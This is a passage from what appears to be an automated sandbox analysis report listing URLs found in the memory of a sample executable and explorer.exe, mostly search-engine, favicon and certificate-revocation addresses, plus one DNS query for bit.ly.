        Source: explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: unknownDNS traffic detected: queries for: bit.ly
        Source: explorer.exe, 00000006.00000000.2129984121.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://%s.com
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://amazon.fr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ariadna.elmundo.es/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://arianna.libero.it/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://asp.usatoday.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://auone.jp/favicon.ico
        Source: explorer.exe, 00000006.00000000.2129984121.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://auto.search.msn.com/response.asp?MT=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://br.search.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://browse.guardian.co.uk/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.buscape.com.br/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.estadao.com.br/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.orange.es/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busca.uol.com.br/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.lycos.es/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com.br/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscador.terra.es/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ozu.es/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://buscar.ya.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://busqueda.aol.com.mx/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cerca.lycos.it/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://clients5.google.com/complete/search?hl=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnet.search.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
        Source: explorer.exe, 00000006.00000000.2119295194.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://computername/printers/printername/.printer
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://corp.naukri.com/favicon.ico
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
        Source: 69577.exe, 00000004.00000002.2108804558.000000000045F000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.
        Source: 69577.exe, 00000004.00000002.2111244695.0000000002268000.00000004.00000001.sdmpString found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://de.search.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.ask.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://es.search.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://find.joins.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
        Source: explorer.exe, 00000006.00000000.2117611941.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
        Source: explorer.exe, 00000006.00000000.2117989946.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
        Source: explorer.exe, 00000006.00000000.2117989946.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
        Source: 69577.exe, 00000004.00000002.2113865385.000000000536D000.00000004.00000001.sdmpString found in binary or memory: http://ns.ao
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.comodoca.com05
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net03
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.entrust.net0D
        Source: 69577.exe, 00000004.00000002.2108823979.0000000000476000.00000004.00000020.sdmpString found in binary or memory: http://ocsp.pki.goog/gsr202
        Source: 69577.exe, 00000004.00000002.2111244695.0000000002268000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.pki.goog/gts1o1core0
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
        Source: 69577.exe, 00000004.00000002.2111244695.0000000002268000.00000004.00000001.sdmpString found in binary or memory: http://pki.goog/gsr2/GTS1O1.crt0
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://rover.ebay.com
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
        Source: 69577.exe, 00000004.00000002.2111244695.0000000002268000.00000004.00000001.sdmpString found in binary or memory: http://schema.org/WebPage
        Source: 69577.exe, 00000004.00000002.2114089575.00000000059C0000.00000002.00000001.sdmp, explorer.exe, 00000006.00000000.2112769729.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
        Source: 69577.exe, 00000004.00000002.2111230551.0000000002241000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.about.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.aol.in/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.auone.jp/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
        Source: explorer.exe, 00000006.00000000.2119866665.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
        Source: explorer.exe, 00000006.00000000.2117989946.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
        Source: explorer.exe, 00000006.00000000.2118839472.0000000004297000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
        Source: explorer.exe, 00000006.00000000.2117422118.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.icoz
        Source: explorer.exe, 00000006.00000000.2117422118.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
        Source: explorer.exe, 00000006.00000000.2129984121.000000000A330000.00000008.00000001.sdmpString found in binary or memory: http://treyresearch.net
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
        Source: explorer.exe, 00000006.00000000.2130246115.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
